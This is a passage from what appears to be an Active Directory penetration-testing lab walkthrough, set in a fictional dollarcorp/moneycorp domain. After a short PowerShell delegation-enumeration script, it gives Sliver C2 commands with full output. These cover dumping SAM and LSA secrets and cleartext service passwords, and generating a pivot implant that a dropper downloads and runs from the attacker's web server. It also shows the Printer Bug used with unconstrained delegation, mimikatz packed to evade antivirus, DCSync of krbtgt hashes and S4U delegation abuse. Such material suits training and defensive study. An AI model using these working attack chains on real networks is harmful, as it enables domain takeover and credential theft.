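    0x1000    = 'WORKSTATION_TRUST_ACCOUNT'
    0x2000    = 'SERVER_TRUST_ACCOUNT'            # domain controller
    0x10000   = 'DONT_EXPIRE_PASSWD'
    0x80000   = 'TRUSTED_FOR_DELEGATION'          # unconstrained delegation
    0x100000  = 'NOT_DELEGATED'                   # account is sensitive and cannot be delegated
    0x1000000 = 'TRUSTED_TO_AUTH_FOR_DELEGATION'  # constrained delegation with protocol transition
}

function ConvertFrom-UserAccountControl([int]$Uac) {
    @(foreach ($bit in $UacFlags.Keys) { if ($Uac -band $bit) { $UacFlags[$bit] } })
}

function Get-DelegationType {
    # $Obj needs sAMAccountName, userAccountControl, msDS-AllowedToDelegateTo and
    # msDS-AllowedToActOnBehalfOfOtherIdentity members (constructed or from LDAP).
    param($Obj)
    $uac  = [int]$Obj.userAccountControl
    $type = if ($uac -band 0x2000)      { 'DomainController (unconstrained by default)' }
            elseif ($uac -band 0x80000) { 'Unconstrained' }
            elseif ($Obj.'msDS-AllowedToDelegateTo') {
                if ($uac -band 0x1000000) { 'Constrained (protocol transition)' } else { 'Constrained (Kerberos only)' }
            }
            else { 'None' }
    [pscustomobject]@{
        SamAccountName = $Obj.sAMAccountName
        Delegation     = $type
        Targets        = @($Obj.'msDS-AllowedToDelegateTo') -join ', '
        RbcdConfigured = [bool]$Obj.'msDS-AllowedToActOnBehalfOfOtherIdentity'   # inbound RBCD set on this object
        UacFlags       = (ConvertFrom-UserAccountControl $uac) -join ', '
    }
}

# Constructed objects: 0x91000 = WORKSTATION_TRUST_ACCOUNT|DONT_EXPIRE_PASSWD|TRUSTED_FOR_DELEGATION,
# 0x92000 swaps in SERVER_TRUST_ACCOUNT, 0x1011000 = workstation|dont-expire|TRUSTED_TO_AUTH_FOR_DELEGATION.
$Samples = @(
    [pscustomobject]@{ sAMAccountName = 'DCORP-APPSRV$'; userAccountControl = 0x91000
                       'msDS-AllowedToDelegateTo' = $null; 'msDS-AllowedToActOnBehalfOfOtherIdentity' = $null }
    [pscustomobject]@{ sAMAccountName = 'DCORP-DC$'; userAccountControl = 0x92000
                       'msDS-AllowedToDelegateTo' = $null; 'msDS-AllowedToActOnBehalfOfOtherIdentity' = $null }
    [pscustomobject]@{ sAMAccountName = 'DCORP-WEB$'; userAccountControl = 0x1011000
                       'msDS-AllowedToDelegateTo' = @('CIFS/dcorp-dc.dollarcorp.moneycorp.local'); 'msDS-AllowedToActOnBehalfOfOtherIdentity' = $null }
)
$Samples | ForEach-Object { Get-DelegationType $_ } | Format-Table -AutoSize

# The lab's filter, extended to drop DCs (SERVER_TRUST_ACCOUNT = 0x2000 = 8192).
$UnconstrainedNoDcFilter = '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288)(!(userAccountControl:1.2.840.113556.1.4.803:=8192)))'

function Find-DelegationHost {
    # Live query against the current domain (domain-joined Windows host); not run in this demo.
    param([string]$Filter = '(objectCategory=computer)')
    $searcher = [adsisearcher]$Filter
    $searcher.PageSize = 500
    foreach ($p in 'sAMAccountName', 'userAccountControl', 'msDS-AllowedToDelegateTo', 'msDS-AllowedToActOnBehalfOfOtherIdentity') {
        [void]$searcher.PropertiesToLoad.Add($p)
    }
    foreach ($r in $searcher.FindAll()) {
        Get-DelegationType ([pscustomobject]@{
            sAMAccountName     = [string]$r.Properties['samaccountname'][0]
            userAccountControl = [int]$r.Properties['useraccountcontrol'][0]
            'msDS-AllowedToDelegateTo'                 = @($r.Properties['msds-allowedtodelegateto'])
            'msDS-AllowedToActOnBehalfOfOtherIdentity' = ($r.Properties['msds-allowedtoactonbehalfofotheridentity'].Count -gt 0)
        })
    }
}
# Find-DelegationHost -Filter $UnconstrainedNoDcFilter   # live equivalent of the ADSearch query above, minus DCs
```

The offline run reports DCORP-APPSRV$ as Unconstrained, DCORP-DC$ as a domain controller and DCORP-WEB$ as constrained with protocol transition. The extended filter is the one to use in a real assessment or audit, because the DC hit is noise and every other unconstrained host is a place where any authenticating account's TGT can be captured.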

Compromise the server and escalate to Domain Admin privileges
Using SharpSecDump, Rubeus, LACheck, SpoolSample and Scshell
Abusing unconstrained delegation requires local administrator access on the delegating host, because the TGTs it caches live in LSASS, so we need a user with local admin rights on dcorp-appsrv. We can extract secrets for dcorp\appadmin, dcorp\srvadmin and dcorp\websvc from dcorp-adminsrv, where we already have administrative access, using SharpSecDump remotely as follows.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 60 '/mnt/c/AD/Tools/SharpSecDump.exe' "-target=dcorp-adminsrv"

[*] sharpsecdump output:


[*] RemoteRegistry service started on dcorp-adminsrv
[*] Parsing SAM hive on dcorp-adminsrv
[*] Parsing SECURITY hive on dcorp-adminsrv
[*] Sucessfully cleaned up on dcorp-adminsrv
---------------Results from dcorp-adminsrv---------------
[*] SAM hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2c0bba089d2d62e4d8911fc2fcc0c2e2
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
[*] Cached domain logon information(domain/username:hash)
DOLLARCORP.MONEYCORP.LOCAL/websvc:$DCC2$10240#websvc#5100e73bf7f60de365fe1e39d21070c9
DOLLARCORP.MONEYCORP.LOCAL/appadmin:$DCC2$10240#appadmin#8bb559da7ec65410afbd8c561b37f5b5
DOLLARCORP.MONEYCORP.LOCAL/srvadmin:$DCC2$10240#srvadmin#904d497b20b7f6aa8667a17d6405289d
DOLLARCORP.MONEYCORP.LOCAL/svcadmin:$DCC2$10240#svcadmin#80dcb7982483a2ee1aaa9ef2da703179
[*] LSA Secrets
[*] $MACHINE.ACC
dollarcorp.moneycorp.local\dcorp-adminsrv$:aad3b435b51404eeaad3b435b51404ee:b5f451985fd34d58d5120816d31b5565
[*] DPAPI_SYSTEM
dpapi_machinekey:b769847ee855152df7a4594c40a86f4e4212d031
dpapi_userkey:15ed629ec20c5b5e266129832d792b0bc84b1010
[*] NL$KM
NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
[*] _SC_SNMPTRAP
dcorp\websvc:AServicewhichIsNotM3@nttoBe
[*] _SC_wmiApSrv
dcorp\appadmin:*ActuallyTheWebServer1
---------------Script execution completed---------------

Let's check whether any of the compromised users has local admin privileges on dcorp-appsrv. The _SC_ entries above are service account passwords stored as LSA secrets, so we have cleartext credentials for dcorp\websvc and dcorp\appadmin.

Get a TGT for dcorp\appadmin using Rubeus.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:appadmin /password:"*ActuallyTheWebServer1" /nowrap /ptt'

[*] rubeus output:


______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.1

[*] Action: Ask TGT


[*] Using rc4_hmac hash: D549831A955FEE51A43C83EFB3928FA7
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\appadmin'
[+] TGT request successful!
[*] base64(ticket.kirbi):

[...........snip............]

[+] Ticket successfully imported!

ServiceName : krbtgt/dollarcorp.moneycorp.local
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : appadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 1/19/2024 5:37:15 AM
EndTime : 1/19/2024 3:37:15 PM
RenewTill : 1/26/2024 5:37:15 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : BZeppby4CClV2x0lllhSEA==
ASREP (key) : D549831A955FEE51A43C83EFB3928FA7

Checking for local admin access with LACheck over WinRM, we find that dcorp\appadmin has local admin access to dcorp-appsrv.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/LACheck.exe' 'winrm /ldap:servers-exclude-dc /threads:10 /domain:dollarcorp.moneycorp.local /user:appadmin'

[*] Output:
[+] Parsed Aguments:
rpc: False
smb: False
winrm: True
/bloodhound: False
/dc:
/domain: dollarcorp.moneycorp.local
/edr: False
/logons: False
/registry: False
/services: False
/ldap: servers-exclude-dc
/ou:
/socket:
/targets:
/threads: 10
/user: appadmin
/verbose: False
[+] Performing LDAP query against dollarcorp.moneycorp.local for all enabled servers excluding Domain Controllers or read-only DCs...
[+] This may take some time depending on the size of the environment
[+] LDAP Search Results: 8
Status: (0.00%) 0 computers finished (+0) -- Using 24 MB RAM
[WinRM] Admin Success: DCORP-ADMINSRV.DOLLARCORP.MONEYCORP.LOCAL as appadmin
[WinRM] Admin Success: DCORP-APPSRV.DOLLARCORP.MONEYCORP.LOCAL as appadmin
[+] Finished enumerating hosts

We can now use Rubeus and SpoolSample (a C# MS-RPRN client) to abuse the Printer Bug together with unconstrained delegation.

Start a TCP pivot listener on dcorp-stdX and generate a corresponding implant.

[server] sliver (dcorp-std_https) > pivots tcp -l 8080
[*] Started tcp pivot listener :8080 with id 1

[server] sliver (dcorp-std_https) > generate --tcp-pivot 172.16.100.X:8080 -e -f shellcode -N dcorp-appsrv_tcp

[*] Generating new windows/amd64 implant binary


[*] Symbol obfuscation is enabled
[*] Build completed in 53s
[*] Implant saved to /mnt/c/AD/Tools/Sliver/dcorp-appsrv_tcp.bin

Host the shellcode using HFS / a python3 webserver.

wsluser@dcorp-studentX:~$ cd /mnt/c/AD/Tools/Sliver

wsluser@dcorp-studentX:~$ sudo python3 -m http.server 80
[sudo] password for wsluser: WSLToTh3Rescue!
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Upload NtDropper onto dcorp-appsrv and launch it with scshell through the wmiApSrv service, as in previous objectives. NtDropper is given the address of our web server and the name of the hosted shellcode file, which it fetches and runs.

[server] sliver (dcorp-std_https) > upload '/mnt/c/AD/Tools/NtDropper.exe' '\\dcorp-appsrv\c$\Windows\temp\NtDropper.exe'
[*] Wrote file to \\dcorp-appsrv\c$\Windows\temp\NtDropper.exe

[server] sliver (dcorp-std_https) > scshell -t 180 dcorp-appsrv wmiApSrv 'C:\Windows\System32\cmd.exe /c start /b C:\windows\Temp\NtDropper.exe 172.16.100.X dcorp-appsrv_tcp.bin'

[*] Successfully executed scshell (coff-loader)


[*] Got output:
Trying to connect to dcorp-appsrv
Using current process context for authentication. (Pass the hash)
SC_HANDLE Manager 0x000000002a0fc0d0
Opening wmiApSrv
SC_HANDLE Service 0x000000002a0fc250
LPQUERY_SERVICE_CONFIGA need 0x0000013a bytes
Original service binary path "C:\Windows\system32\wbem\WmiApSrv.exe"
Service path was changed to "C:\Windows\System32\cmd.exe /c start /b C:\windows\Temp\NtDropper.exe 172.16.100.X dcorp-appsrv_tcp.bin"
Service was started
Service path was restored to "C:\Windows\system32\wbem\WmiApSrv.exe"

[*] Session 61d9999a dcorp-appsrv_tcp - 172.16.100.X:49902->dcorp-std_https->


(dcorp-appsrv) - windows/amd64 - Fri, 19 Jan 2024 07:48:04 PST

Now that we have a session on dcorp-appsrv, we can begin exploiting Unconstrained Delegation. Start
multiplayer mode to create two live sessions (one on dcorp-appsrv and the other on dcorp-stdX) on
the Sliver C2, so that we can exploit the Printer Bug and capture the TGT in another terminal simultaneously.

[server] sliver (dcorp-std_https) > multiplayer
[*] Multiplayer mode enabled!

[server] sliver (dcorp-std_https) > new-operator --name m3rcer --lhost 172.16.100.X
[*] Generating new client certificate, please wait ...
[*] Saved new client config to: /mnt/c/AD/Tools/Sliver/m3rcer_172.16.100.X.cfg

[*] m3rcer has joined the game



Spawn another Ubuntu WSL prompt and execute the sliver-client_linux binary: import the generated
configuration using the import command and start a new multiplayer session by connecting to the Sliver
C2 on a new Kali terminal. Use this client to access the dcorp-appsrv session and capture the corresponding TGT
with Rubeus on dcorp-appsrv, and use the dcorp-stdX session on the main Sliver server to perform
the MS-RPRN exploit.

wsluser@dcorp-studentX:~$ cd /mnt/c/AD/Tools/Sliver

wsluser@dcorp-studentX:/mnt/c/AD/Tools/Sliver$ sudo ./sliver-client_linux import ./m3rcer_172.16.100.X.cfg
2024/01/19 07:57:31 Saved new client config to: /root/.sliver-client/configs/m3rcer_172.16.100.X.cfg

wsluser@dcorp-studentX:/mnt/c/AD/Tools/Sliver$ sudo ./sliver-client_linux

Connecting to 172.16.100.X:31337 ...

sliver > sessions

ID         Transport   Remote Address                            Hostname         Username               Operating System   Health
========== =========== ========================================= ================ ====================== ================== =========
61d9999a   pivot       172.16.100.X:49902->dcorp-std_https->     dcorp-appsrv     NT AUTHORITY\SYSTEM    windows/amd64      [ALIVE]
7a46cc3c   http(s)     172.16.100.X:49902                        dcorp-studentX   dcorp\studentX         windows/amd64      [ALIVE]
b9cd498e   http(s)     172.16.100.X:49745                        dcorp-studentX   NT AUTHORITY\SYSTEM    windows/amd64      [ALIVE]

sliver > sessions -i 61d9999a

[*] Active session dcorp-appsrv_tcp (61d9999a)

Perform the following steps consecutively. On the dcorp-appsrv (Sliver client) session, run Rubeus in harvest
mode, which takes monitor mode one step further to capture TGTs; this matters because a Sliver session task
returns no output if execution runs beyond the task timeout. rubeus harvest /runfor:<x>
lets us specify how long the command runs, and if this is below the Sliver task timeout we should
receive the desired output (note below: timeout 45 > harvest /runfor:30).
sliver (dcorp-appsrv_tcp) > ps

 Pid    Ppid   Owner                          Arch     Executable            Session
====== ====== ============================== ======== ===================== =========
[......snip......]
 4028   2176   NT AUTHORITY\SYSTEM            x86_64   svchost.exe           0
 1620   1000   NT AUTHORITY\SYSTEM            x86_64   svchost.exe           0

sliver (dcorp-appsrv_tcp) > execute-assembly -P 1620 -p 'C:\windows\system32\taskhostw.exe' -t 60 '/mnt/c/AD/Tools/Rubeus.exe' 'harvest /runfor:30 /interval:8 /nowrap /targetuser:DCORP-DC$'

[*] Output:

[*] Action: TGT Harvesting (with auto-renewal)

[*] Target user     : DCORP-DC$
[*] Monitoring every 8 seconds for new TGTs
[*] Displaying the working TGT cache every 8 seconds
[*] Running collection for 30 seconds

[*] Refreshing TGT ticket cache (1/19/2024 8:10:31 AM)

  User                  :  DCORP-DC$@DOLLARCORP.MONEYCORP.LOCAL
  StartTime             :  1/19/2024 7:08:57 AM
  EndTime               :  1/19/2024 5:08:57 PM
  RenewTill             :  1/24/2024 7:37:45 AM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    doIGRTCCBkGgAwIBBaEDAgE[....snip.....]

[*] Ticket cache size: 1

[*] Sleeping until 9/29/2022 1:43:42 AM (8 seconds) for next display

And in the other dcorp-stdX session (Sliver server), immediately perform the MS-RPRN exploit using
SpoolSample.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 20 '/mnt/c/AD/Tools/SpoolSample.exe' 'dcorp-dc.dollarcorp.moneycorp.local dcorp-appsrv.dollarcorp.moneycorp.local'

[*] Output:
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function

On the dcorp-appsrv session (Sliver client), copy the base64 encoded ticket, then use Rubeus to import
it and Pass the Ticket.

[server] sliver (dcorp-std_https) > inline-execute-assembly -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 'ptt /ticket:doIGRTCCBkGgAwIBBaEDAgE[....snip.....]'

[*] rubeus output:

[*] Action: Import Ticket
[+] Ticket successfully imported!

[+] inlineExecute-Assembly Finished

We can now run a DCSync attack to validate the imported ticket.


[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-dcsync.exe.packed.dotnet.exe'

[*] Output:

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt


[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt


Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 9:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986

[..............snip................]



Escalation to Enterprise Admins
Using Rubeus, SpoolSample, PEzor and Scshell
To get Enterprise Admin privileges, we need to force authentication from mcorp-dc. Repeat the same
process as before to capture TGTs of mcorp-dc from dcorp-appsrv.

Set up Rubeus as before in the dcorp-appsrv session (Sliver client) to capture the mcorp-dc$ TGT.

sliver (dcorp-appsrv_tcp) > execute-assembly -P 1620 -p 'C:\windows\system32\taskhostw.exe' -t 60 '/mnt/c/AD/Tools/Rubeus.exe' 'harvest /runfor:30 /interval:8 /nowrap /targetuser:MCORP-DC$'

[*] rubeus output:

[*] Action: TGT Harvesting (with auto-renewal)

[*] Target user     : MCORP-DC$
[*] Monitoring every 8 seconds for new TGTs
[*] Displaying the working TGT cache every 8 seconds
[*] Running collection for 30 seconds

[*] Refreshing TGT ticket cache (1/19/2024 8:34:00 AM)

  User                  :  MCORP-DC$@MONEYCORP.LOCAL
  StartTime             :  1/19/2024 7:06:30 AM
  EndTime               :  1/19/2024 5:06:30 PM
  RenewTill             :  1/24/2024 7:36:04 AM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :

doIFVjCCBVKgAw[.....snip....]Gw9NT05FWUNPUlAuTE9DQUw=

[*] Ticket cache size: 1


[*] Sleeping until 9/29/2022 2:43:42 AM (8 seconds) for next display

[*] Completed running for 30 seconds, exiting

Simultaneously, in the dcorp-stdX session (Sliver server), perform the MS-RPRN exploit using
SpoolSample, the same as before.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 20 '/mnt/c/AD/Tools/SpoolSample.exe' 'mcorp-dc.moneycorp.local dcorp-appsrv.dollarcorp.moneycorp.local'

[*] Output:
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function

In a new Ubuntu WSL prompt, create a .NET mimikatz binary to perform a DCSync on mcorp
(lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local) as follows.

wsluser@dcorp-studentX:~$ cd /mnt/c/AD/Tools/PEzor/

wsluser@dcorp-studentX:/mnt/c/AD/Tools/PEzor$ sudo su
[sudo] password for wsluser: WSLToTh3Rescue!

root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# ./PEzor.sh -unhook -antidebug -fluctuate=NA -format=dotnet -sleep=5 /mnt/c/AD/Tools/PEzor/mimikatz.exe -z 2 -p '"lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"'

---------------------------------------------------------------------------
[?] Unhook enabled
[?] Anti-debug enabled
[?] Fluctuate: NA
[?] Output format: dotnet
[?] Waiting 5 seconds before executing the payload
[?] Processing /mnt/c/AD/Tools/PEzor/mimikatz.exe
[?] PE detected: /mnt/c/AD/Tools/PEzor/mimikatz.exe: PE32+ executable (console) x86-64, for MS Windows
[?] Building .NET executable
[?] Executing donut

  [ Donut shellcode generator v1 (built Jan 15 2024 02:44:21)
  [ Copyright (c) 2019-2021 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "/mnt/c/AD/Tools/PEzor/mimikatz.exe"
  [ Entropy       : Random names + Encryption
  [ Compressed    : aPLib (Reduced by 55%)
  [ File type     : EXE
  [ Parameters    : "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP/ETW : continue
  [ PE Headers    : overwrite
  [ Shellcode     : "/tmp/tmp.cPvUTONWm3/shellcode.cs"
  [ Exit          : Thread
[!] Done! Check /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows

root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# mv /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-dcsync-mcorp.exe.packed.dotnet.exe

Use Rubeus to import and Pass the Ticket from the Rubeus output.


[server] sliver (dcorp-std_https) > inline-execute-assembly -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 'ptt /ticket:doIGRTCCBkGgAwIBBaEDAgE[....snip.....]'

[*] rubeus output:

[*] Action: Import Ticket
[+] Ticket successfully imported!

[+] inlineExecute-Assembly Finished

We can now run a DCSync attack to validate the imported ticket.


[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-dcsync-mcorp.exe.packed.dotnet.exe'

[*] Output:

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local
[DC] 'moneycorp.local' will be the domain
[DC] 'mcorp-dc.moneycorp.local' will be the DC server
[DC] 'mcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt


Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 9:46:24 PM
Object Security ID : S-1-5-21-335606122-960912869-3279953914-502
Object Relative ID : 502

Credentials:
Hash NTLM: a0981492d5dfab1ae0b97b51ea895ddf
[snip]

Exit from the Sliver Client using the exit command and continue exploitation using the primary Sliver
server dcorp-stdX session.



Learning Objective 16
Enumerate users in the domain for whom Constrained Delegation is enabled.

• For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is
configured.

• Pass the ticket and access the service.

Enumerate computer accounts in the domain for which Constrained Delegation is enabled.

• For such a computer account, request a TGT from the DC.

• Obtain an alternate TGS for the LDAP service on the target machine.

• Use the TGS for executing a DCSync attack.

Constrained Delegation user enumeration


Using StandIn
We first need to find a user that has constrained delegation enabled. We can use StandIn to do this on
the dcorp-stdX session. The --delegation argument enumerates all types of delegation that are
enabled.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/StandIn.exe' --delegation

[*] Output:
[?] Found 2 object(s) with constrained delegation..

[*] SamAccountName           : DCORP-ADMINSRV$
    DistinguishedName        : CN=DCORP-ADMINSRV,OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
    msDS-AllowedToDelegateTo : TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL
                               TIME/dcorp-DC
    Protocol Transition      : True
    userAccountControl       : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION

[*] SamAccountName           : websvc
    DistinguishedName        : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
    msDS-AllowedToDelegateTo : CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL
                               CIFS/dcorp-mssql
    Protocol Transition      : True
    userAccountControl       : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION

[......snip......]



Using ADSearch
To enumerate users with constrained delegation we can use ADSearch with a raw LDAP query using the
--search argument: (&(objectCategory=user)(msds-allowedtodelegateto=*)). This LDAP query searches
for all user objects that have the msds-allowedtodelegateto attribute set.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 60 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(&(objectCategory=user)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json'

[*] Output:
___ ____ _____ __
/ | / __ \/ ___/___ ____ ______/ /_
/ /| | / / / /\__ \/ _ \/ __ `/ ___/ __ \
/ ___ |/ /_/ /___/ / __/ /_/ / /__/ / / /
/_/ |_/_____//____/\___/\__,_/\___/_/ /_/

GitHub: @tomcarver16
[*] No domain supplied. This PCs domain will be used instead
[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 1
[
  {
    "cn": "web svc",
    "dnshostname": null,
    "samaccountname": "websvc",
    "msds-allowedtodelegateto": [
      "CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL",
      "CIFS/dcorp-mssql"
    ]
  }
]



Constrained Delegation user abuse
Using Rubeus
We already have secrets of dcorp\websvc from the dcorp-adminsrv machine.

Abuse Constrained Delegation using the hash of dcorp\websvc with Rubeus as follows.

[server] sliver (dcorp-std_https) > execute-assembly -t 40 -P 2396 -p "C:\windows\system32\taskhostw.exe" '/mnt/c/AD/Tools/Rubeus.exe' 's4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt'

[*] rubeus output:

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\websvc'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFbjCCBWqgAwI[..........snip............]

[*] Action: S4U

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building S4U2self request for: 'websvc@DOLLARCORP.MONEYCORP.LOCAL'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'websvc@DOLLARCORP.MONEYCORP.LOCAL'
[*] base64(ticket.kirbi):

      doIF1DCCBdCgA[..........snip............]

[*] Impersonating user 'Administrator' to target SPN 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building S4U2proxy request for service: 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL':

      doIHGDCCBxSgAw[..........snip............]

[+] Ticket successfully imported!



Try accessing the filesystem on dcorp-mssql.

[server] sliver (dcorp-std_https) > ls '\\dcorp-mssql.dollarcorp.moneycorp.local\c$'

\\dcorp-mssql.dollarcorp.moneycorp.local\c$\ (14 items, 384.0 MiB)
==================================================================
drwxrwxrwx  $RECYCLE.BIN                         <dir>      Fri Nov 11 02:38:19 -0800 2022
drwxrwxrwx  $WinREAgent                          <dir>      Tue Jan 16 04:42:25 -0800 2024
Lrw-rw-rw-  Documents and Settings -> C:\Users   0 B        Fri Nov 11 00:53:09 -0800 2022
-rw-rw-rw-  DumpStack.log.tmp                    12.0 KiB   Tue Jan 16 04:40:09 -0800 2024

[..........snip.........]



Constrained Delegation computer enumeration
Using StandIn
We first need to find a computer that has constrained delegation enabled. We can use StandIn to do this
on the dcorp-stdX session. The --delegation argument enumerates all types of delegation that are
enabled.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/StandIn.exe' --delegation

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local

[?] Found 2 object(s) with constrained delegation..

[*] SamAccountName           : websvc
    DistinguishedName        : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
    msDS-AllowedToDelegateTo : CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL
                               CIFS/dcorp-mssql
    Protocol Transition      : True
    userAccountControl       : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION

[*] SamAccountName           : DCORP-ADMINSRV$
    DistinguishedName        : CN=DCORP-ADMINSRV,OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
    msDS-AllowedToDelegateTo : TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL
                               TIME/dcorp-DC
    Protocol Transition      : True
